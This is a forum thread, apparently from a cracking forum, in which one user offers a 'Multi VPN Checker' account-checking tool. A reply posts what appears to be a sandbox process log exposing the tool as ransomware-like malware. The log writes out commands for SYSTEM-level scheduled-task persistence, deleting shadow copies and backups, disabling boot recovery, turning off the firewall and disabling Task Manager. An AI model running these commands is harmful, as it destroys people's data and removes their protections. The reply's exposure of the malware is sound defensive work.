Jerry56, posted April 7, 2023

https://i.imgur.com/WD7XouK.jpg

Checking: HMA(PL), goosevpn, vyper, nord, surfshark, safervpn.
Proxy type: http\s, socks4, socks4/5, socks5.
Password 123
Multi VPN Checker by APSOFT

HailHydra, posted April 24, 2023

@amd8, @P3rk0c3t, @lashes, @lomo

winlogon.exe (PID: 6832 cmdline: "C:\Users\user\Desktop\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C)
cmd.exe (PID: 6332 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\user\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
schtasks.exe (PID: 6896 cmdline: schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\user\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: 15FF7D8324231381BAD48A052F85DF04)
csc.exe (PID: 4428 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\genzb5nm\genzb5nm.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cvtres.exe (PID: 6352 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBE.tmp" "c:\ProgramData\CSCAA1ED80841964C04A0A532F2FC31DC6F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
cmd.exe (PID: 8664 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 8792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
vssadmin.exe (PID: 8924 cmdline: vssadmin delete shadows /all /quiet MD5: 7E30B94672107D3381A1D175CF18C147)
cmd.exe (PID: 8820 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 3088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 3416 cmdline: "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
WMIC.exe (PID: 4400 cmdline: wmic shadowcopy delete MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
cmd.exe (PID: 956 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 10368 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 10676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 5780 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 9044 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 8996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 4620 cmdline: netsh advfirewall set currentprofile state off MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
cmd.exe (PID: 8960 cmdline: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 8924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 3396 cmdline: netsh firewall set opmode mode=disable MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
winlogon.exe (PID: 10348 cmdline: C:\Users\user\AppData\Roaming\winlogon.exe MD5: 8AEA251877CB4F5EE6CF357831F8620C)
cmd.exe (PID: 10140 cmdline: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Windows\system32\config\systemprofile\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
schtasks.exe (PID: 5760 cmdline: schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Windows\system32\config\systemprofile\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F MD5: 15FF7D8324231381BAD48A052F85DF04)
cmd.exe (PID: 488 cmdline: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
vssadmin.exe (PID: 3952 cmdline: vssadmin delete shadows /all /quiet MD5: 7E30B94672107D3381A1D175CF18C147)
cmd.exe (PID: 6436 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 5692 cmdline: "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
WMIC.exe (PID: 2352 cmdline: wmic shadowcopy delete MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
cmd.exe (PID: 2904 cmdline: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 3348 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 6132 cmdline: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 6120 cmdline: "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 7000 cmdline: netsh advfirewall set currentprofile state off MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
cmd.exe (PID: 6932 cmdline: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 3652 cmdline: netsh firewall set opmode mode=disable MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
winlogon.exe (PID: 8528 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C)
winlogon.exe (PID: 5160 cmdline: "C:\ProgramData\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C)
winlogon.exe (PID: 5572 cmdline: "C:\ProgramData\winlogon.exe" MD5: 8AEA251877CB4F5EE6CF357831F8620C)
cmd.exe (PID: 2252 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
conhost.exe (PID: 10176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
reg.exe (PID: 4752 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: E3DACF0B31841FA02064B4457D44B357)